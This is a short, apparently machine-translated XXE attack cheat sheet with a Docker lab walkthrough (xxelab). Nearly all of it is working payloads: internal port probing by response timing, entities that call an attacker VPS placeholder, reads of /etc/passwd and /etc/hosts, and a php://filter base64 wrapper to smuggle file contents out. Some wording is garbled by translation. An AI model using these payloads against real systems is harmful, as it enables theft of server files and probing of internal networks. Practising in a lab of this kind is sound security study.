Reference an external DTD file access internal host / port.
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看响应时间)
Reference an external DTD file access wai network.
<!DOCTYPE a SYSTEM "http://vps_ip" >
Internal reference entity.
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
External entity read local files.
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
wang host port access internal and external entities.
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看响应时间)
External entities to access wai network.
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
docker download rrodrigo / xxelab the mirror
Start: docker run -d -p 8082: 80 rrodrigo / xxelab
Registration grab bag, found that the use xml format transfer, and the mailbox has returned:
The contents of the return echo for setting the read xxe / etc / passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>
Using base64 encoding xxe, prevent return package validation
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
Return packet base64, base64 decoding